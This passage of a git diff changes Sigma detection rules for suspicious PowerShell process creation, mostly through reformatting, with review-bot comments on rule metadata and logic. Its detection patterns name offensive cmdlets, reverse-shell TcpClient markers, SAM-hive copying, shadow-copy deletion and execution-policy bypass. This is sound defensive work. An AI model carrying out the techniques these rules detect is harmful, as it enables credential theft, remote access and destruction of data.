 EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - New-MailboxExportRequest - ' -Mailbox ' - ' -FilePath \\\\'
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml
index 757c85d60..48a48d0d9 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml
@@ -1,10 +1,10 @@
 title: Malicious PowerShell Commandlets - ProcessCreation id: 02030f2f-6199-49ec-b258-ea71b07e03dc related: - - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - type: derived - - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c - type: similar + - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + type: derived + - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c + type: similar status: experimental description: Detects Commandlet names from well-known PowerShell exploitation frameworks references:
@@ -14,9 +14,9 @@ references:
 - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - - https://github.com/calebstewart/CVE-2021-1675 + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec + - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html - https://github.com/HarmJ0y/DAMP
@@ -48,7 +48,8 @@ detection:
 EventID: 4688 Channel: Security selection: - CommandLine|contains: + # Note: Please ensure alphabetical order when adding new entries + CommandLine|contains: - Add-Exfiltration - Add-Persistence - Add-RegBackdoor
@@ -73,7 +74,7 @@ detection:
 - Find-Fruit - Find-GPOLocation - Find-TrustedDocuments - - Get-ADIDNS + - Get-ADIDNS # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone - Get-ApplicationHost - Get-ChromeDump - Get-ClipboardContents
@@ -142,7 +143,7 @@ detection:
 - Invoke-Farmer - Invoke-Get-RBCD-Threaded - Invoke-Gopher - - Invoke-Grouper + - Invoke-Grouper # Also Covers Invoke-GrouperX - Invoke-HandleKatz - Invoke-ImpersonatedProcess - Invoke-ImpersonateSystem
@@ -166,7 +167,7 @@ detection:
 - Invoke-P0wnedshell - Invoke-Paranoia - Invoke-PortScan - - Invoke-PoshRatHttp + - Invoke-PoshRatHttp # Also Covers Invoke-PoshRatHttps - Invoke-PostExfil - Invoke-PowerDump - Invoke-PowerShellTCP
@@ -185,7 +186,7 @@ detection:
 - Invoke-Seatbelt - Invoke-ServiceAbuse - Invoke-ShadowSpray - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - Invoke-Shellcode - Invoke-SMBScanner - Invoke-Snaffler
@@ -231,7 +232,7 @@ detection:
 - Remove-Update - Rename-ADIDNSNode - Revoke-ADIDNSPermission - - Set-ADIDNSNode + - Set-ADIDNSNode # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner - Set-MacAttribute - Set-MachineAccountAttribute - Set-Wallpaper
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml
index e46b450bd..ae3ae185d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml
@@ -1,8 +1,8 @@
 title: MSExchange Transport Agent Installation id: 83809e84-4475-4b69-bc3e-4aad8568612f related: - - id: 83809e84-4475-4b69-bc3e-4aad8568612f - type: similar + - id: 83809e84-4475-4b69-bc3e-4aad8568612f + type: similar status: test description: Detects the Installation of a Exchange Transport Agent references:
@@ -21,12 +21,11 @@ detection:
 EventID: 4688 Channel: Security selection: - CommandLine|contains: Install-TransportAgent + CommandLine|contains: Install-TransportAgent condition: process_creation and selection fields: - AssemblyPath falsepositives: - - Legitimate installations of exchange TransportAgents. AssemblyPath is a good - indicator for this. + - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: medium ruletype: Sigma
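Review bot: In the proc_creation_win_powershell_msexchange_transport_agent.yml hunk, the re-indented `related` entry `- id: 83809e84-4475-4b69-bc3e-4aad8568612f` with `type: similar` carries the same value as the rule's own `id: 83809e84-4475-4b69-bc3e-4aad8568612f`, so the rule declares itself as its own similar rule. The entry presumably was meant to point at another variant of this detection; it should reference that rule's identifier (`[ID of the related rule]` until confirmed) or be removed, since a self-reference gives consumers that follow `related` links nothing to resolve. Both hunks of this file are complete within this view.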
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml
index 428a783e6..a17f4d5d4 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml
@@ -1,8 +1,7 @@
 title: Non Interactive PowerShell Process Spawned id: f4bbd493-b796-416e-bbf2-121235348529 status: test -description: Detects non-interactive PowerShell activity by looking at the "powershell" - process with a non-user GUI process such as "explorer.exe" as a parent. +description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. references: - https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
@@ -19,12 +18,12 @@ detection:
 EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll filter_main_generic: ParentProcessName|endswith: - :\Windows\explorer.exe
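Review bot: The unwrapped description `Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.` reads as though explorer.exe were an example of the parent being matched, while `filter_main_generic` in the second hunk excludes `:\Windows\explorer.exe` as a parent. Since the commit already rewrites this line, it is a good moment to make it match the logic, e.g. `Detects non-interactive PowerShell activity by looking at the "powershell" process whose parent is not a user GUI process such as "explorer.exe".` Both hunks of this file are complete within this view.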
@@ -33,16 +32,14 @@ detection:
 filter_main_windows_update:
 ParentProcessName: :\$WINDOWS.~BT\Sources\SetupHost.exe
 filter_optional_vscode:
+ # Triggered by VsCode when you open a Shell inside the workspace
 ParentCommandLine|contains: ' --ms-enable-electron-run-as-node '
 ParentProcessName|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe
 filter_optional_terminal:
 ParentProcessName|contains: :\Program Files\WindowsApps\Microsoft.WindowsTerminal_
 ParentProcessName|endswith: \WindowsTerminal.exe
- condition: process_creation and (selection and not 1 of filter_main_* and not
- 1 of filter_optional_*)
+ condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
 falsepositives:
- - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB
- scripts which may trigger this rule often. It is best to add additional filters
- or use this to hunt for anomalies
+ - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies
 level: low
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml
index 6384d524a..79a91eb6b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml
@@ -20,7 +20,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: (WCHAR)0x
+ CommandLine|contains: (WCHAR)0x
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_public_folder.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_public_folder.yml
index 9638b9a61..7bb085f25 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_public_folder.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_public_folder.yml
@@ -1,8 +1,7 @@
 title: Execution of Powershell Script in Public Folder
 id: fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4
 status: test
-description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public"
- folder
+description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
 references:
 - https://www.mandiant.com/resources/evolution-of-fin7
 author: Max Altgelt (Nextron Systems)
@@ -19,7 +18,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - -f C:\Users\Public
 - -f "C:\Users\Public
 - -f %Public%
@@ -32,7 +31,7 @@ detection:
 - -file C:\Users\Public
 - -file "C:\Users\Public
 - -file %Public%
- NewProcessName|endswith:
+ NewProcessName|endswith:
 - \powershell.exe
 - \pwsh.exe
 condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml
index 49430b1c6..fa33a34b6 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml
@@ -1,16 +1,14 @@
 title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
 id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5
 related:
- - id: f65e22f9-819e-4f96-9c7b-498364ae7a25
- type: similar
- - id: 38a7625e-b2cb-485d-b83d-aff137d859f4
- type: similar
- - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5
- type: similar
+ - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic
+ type: similar
+ - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module
+ type: similar
+ - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock
+ type: similar
 status: test
-description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand"
- which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom
- PowerShell code via module load-order hijacking.
+description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
 - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
@@ -28,7 +26,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - Invoke-ATHRemoteFXvGPUDisablementCommand
 - Invoke-ATHRemoteFXvGPUDisableme
 condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml
index e3e3a8470..df0235cfb 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml
@@ -1,9 +1,7 @@
 title: Potential Powershell ReverseShell Connection
 id: edc2f8ae-2412-4dfd-b9d5-0c57727e70be
 status: stable
-description: Detects usage of the "TcpClient" class. Which can be abused to establish
- remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine"
- reverse shell and other.
+description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
 references:
 - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
@@ -22,14 +20,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' Net.Sockets.TCPClient'
 - .GetStream(
 - .Write(
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml
index 574188065..a3c3459e4 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml
@@ -18,13 +18,13 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - Get-Content
 - -Stream
 ParentProcessName|endswith:
 - \powershell.exe
 - \pwsh.exe
- NewProcessName|endswith:
+ NewProcessName|endswith:
 - \powershell.exe
 - \pwsh.exe
 condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml
index 9f011ae8d..a2bb2235b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml
@@ -20,8 +20,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|re: \s-\s*<
- NewProcessName|endswith:
+ CommandLine|re: \s-\s*<
+ NewProcessName|endswith:
 - \powershell.exe
 - \pwsh.exe
 condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_sam_access.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_sam_access.yml
index 323187517..bd0923b17 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_sam_access.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_sam_access.yml
@@ -18,11 +18,11 @@ detection:
 EventID: 4688
 Channel: Security
 selection_1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - \HarddiskVolumeShadowCopy
 - System32\config\sam
 selection_2:
- CommandLine|contains:
+ CommandLine|contains:
 - Copy-Item
 - cp $_.
 - cpi $_.
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml
index d9461e6af..0275040ed 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml
@@ -1,8 +1,7 @@
 title: Suspicious PowerShell Invocation From Script Engines
 id: 95eadcb2-92e4-4ed1-9031-92547773a6db
 status: test
-description: Detects suspicious powershell invocations from interpreters or unusual
- programs
+description: Detects suspicious powershell invocations from interpreters or unusual programs
 references:
 - https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/
 author: Florian Roth (Nextron Systems)
@@ -22,7 +21,7 @@ detection:
 ParentProcessName|endswith:
 - \wscript.exe
 - \cscript.exe
- NewProcessName|endswith:
+ NewProcessName|endswith:
 - \powershell.exe
 - \pwsh.exe
 filter_health_service:
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml
index e984b4b89..7233364d8 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml
@@ -1,12 +1,10 @@
 title: Suspicious Service DACL Modification Via Set-Service Cmdlet
 id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac
 related:
- - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37
- type: derived
+ - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37
+ type: derived
 status: test
-description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using
- the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can
- be used to hide services or make them unstopable
+description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
 references:
 - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
 - https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings
@@ -23,17 +21,17 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \pwsh.exe
- - OriginalFileName: pwsh.dll
+ - NewProcessName|endswith: \pwsh.exe
+ - OriginalFileName: pwsh.dll
 selection_sddl_flag:
- CommandLine|contains:
+ CommandLine|contains:
 - '-SecurityDescriptorSddl '
 - '-sd '
 selection_set_service:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'Set-Service '
 - D;;
- CommandLine|contains:
+ CommandLine|contains:
 - ;;;IU
 - ;;;SU
 - ;;;BA
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl.yml
index d57d4b2f4..7693c60ca 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl.yml
@@ -1,12 +1,12 @@
 title: PowerShell Script Change Permission Via Set-Acl
 id: bdeb2cff-af74-4094-8426-724dc937f20a
 related:
- - id: cae80281-ef23-44c5-873b-fd48d2666f49
- type: derived
- - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73
- type: derived
- - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478
- type: derived
+ - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low
+ type: derived
+ - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp
+ type: derived
+ - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High
+ type: derived
 status: test
 description: Detects PowerShell execution to set the ACL of a file or a folder
 references:
@@ -24,14 +24,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
 selection_cmdlet:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'Set-Acl '
 - '-AclObject '
 - '-Path '
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml
index eaba1abc0..fd9d99e0f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml
@@ -1,12 +1,12 @@
 title: PowerShell Set-Acl On Windows Folder
-id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73
+id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp
 related:
- - id: cae80281-ef23-44c5-873b-fd48d2666f49
- type: derived
- - id: bdeb2cff-af74-4094-8426-724dc937f20a
- type: derived
- - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478
- type: derived
+ - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low
+ type: derived
+ - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low
+ type: derived
+ - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High
+ type: derived
 status: test
 description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
 references:
@@ -24,24 +24,26 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
 selection_cmdlet:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'Set-Acl '
 - '-AclObject '
 selection_paths:
- CommandLine|contains:
+ # Note: Add more suspicious paths
+ CommandLine|contains:
 - -Path "C:\Windows
 - -Path 'C:\Windows
 - -Path %windir%
 - -Path $env:windir
 selection_permissions:
- CommandLine|contains:
+ # Note: Add more suspicious permissions
+ CommandLine|contains:
 - FullControl
 - Allow
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml
index b752b85d1..c4a8dcdb5 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml
@@ -1,15 +1,14 @@
 title: Change PowerShell Policies to an Insecure Level
 id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180
 related:
- - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f
- type: similar
- - id: 61d0475c-173f-4844-86f7-f3eebae1c66b
- type: similar
- - id: fad91067-08c5-4d1a-8d8c-d96a21b37814
- type: similar
+ - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry
+ type: similar
+ - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # ScriptBlock
+ type: similar
+ - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry
+ type: similar
 status: test
-description: Detects changing the PowerShell script execution policy to a potentially
- insecure level using the "-ExecutionPolicy" flag.
+description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
 references:
 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1
 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1
@@ -29,19 +28,19 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
 selection_option:
- CommandLine|contains:
+ CommandLine|contains:
 - '-executionpolicy '
 - ' -ep '
 - ' -exec '
 selection_level:
- CommandLine|contains:
+ CommandLine|contains:
 - Bypass
 - Unrestricted
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml
index 0f8034277..135df146f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml
@@ -1,8 +1,7 @@
 title: Service StartupType Change Via PowerShell Set-Service
 id: 62b20d44-1546-4e61-afce-8e175eb9473c
 status: test
-description: Detects the use of the PowerShell "Set-Service" cmdlet to change the
- startup type of a service to "disabled" or "manual"
+description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
 references:
 - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,13 +18,13 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \powershell.exe
- - OriginalFileName: PowerShell.EXE
+ - NewProcessName|endswith: \powershell.exe
+ - OriginalFileName: PowerShell.EXE
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - Set-Service
 - -StartupType
- CommandLine|contains:
+ CommandLine|contains:
 - Disabled
 - Manual
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml
index 221944403..89c79f0b7 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml
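Review bot: The re-indented `selection_img` of the Set-Service StartupType rule matches only `\powershell.exe` / `PowerShell.EXE`, whereas every other PowerShell process-creation rule in this patch (stop_service, set_acl, snapins, set_policies) also lists `\pwsh.exe` and `pwsh.dll`, and the sibling DACL rule above targets `Set-Service` under pwsh specifically, so `Set-Service -StartupType Disabled` run from PowerShell 7 is not covered here. The gap predates this commit, which only changes indentation, but since the selection is being rewritten it is the natural moment to align it with the others: `- NewProcessName|endswith: [\powershell.exe, \pwsh.exe]` and `- OriginalFileName: [PowerShell.EXE, pwsh.dll]`. If the narrower image set is deliberate, a one-line comment on `selection_img` saying why would stop the next reviewer from raising the same point.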
@@ -1,14 +1,12 @@
 title: Deletion of Volume Shadow Copies via WMI with PowerShell
 id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40
 related:
- - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e
- type: derived
- - id: c1337eb8-921a-4b59-855b-4ba188ddcc42
- type: similar
+ - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e
+ type: derived
+ - id: c1337eb8-921a-4b59-855b-4ba188ddcc42
+ type: similar
 status: test
-description: Detects deletion of Windows Volume Shadow Copies with PowerShell code
- and Get-WMIObject. This technique is used by numerous ransomware families such
- as Sodinokibi/REvil
+description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell
 - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html
@@ -26,15 +24,15 @@ detection:
 EventID: 4688
 Channel: Security
 selection_get:
- CommandLine|contains:
+ CommandLine|contains:
 - Get-WmiObject
 - gwmi
 - Get-CimInstance
 - gcim
 selection_shadowcopy:
- CommandLine|contains: Win32_Shadowcopy
+ CommandLine|contains: Win32_Shadowcopy
 selection_delete:
- CommandLine|contains:
+ CommandLine|contains:
 - .Delete()
 - Remove-WmiObject
 - rwmi
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml
index c887f5c32..61e2e3060 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml
@@ -1,8 +1,7 @@
 title: Exchange PowerShell Snap-Ins Usage
 id: 25676e10-2121-446e-80a4-71ff8506af47
 status: experimental
-description: Detects adding and using Exchange PowerShell snap-ins to export mailbox
- data. As seen used by HAFNIUM and APT27
+description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
 references:
 - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
@@ -23,21 +22,21 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
 selection_cli:
- CommandLine|contains: Add-PSSnapin
+ CommandLine|contains: Add-PSSnapin
 selection_module:
- CommandLine|contains:
+ CommandLine|contains:
 - Microsoft.Exchange.Powershell.Snapin
 - Microsoft.Exchange.Management.PowerShell.SnapIn
 filter_msiexec:
- CommandLine|contains: $exserver=Get-ExchangeServer ([Environment]::MachineName)
- -ErrorVariable exerr 2> $null
+ # ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding C9138ECE2536CB4821EB5F55D300D88E E Global\MSI0000
+ CommandLine|contains: $exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null
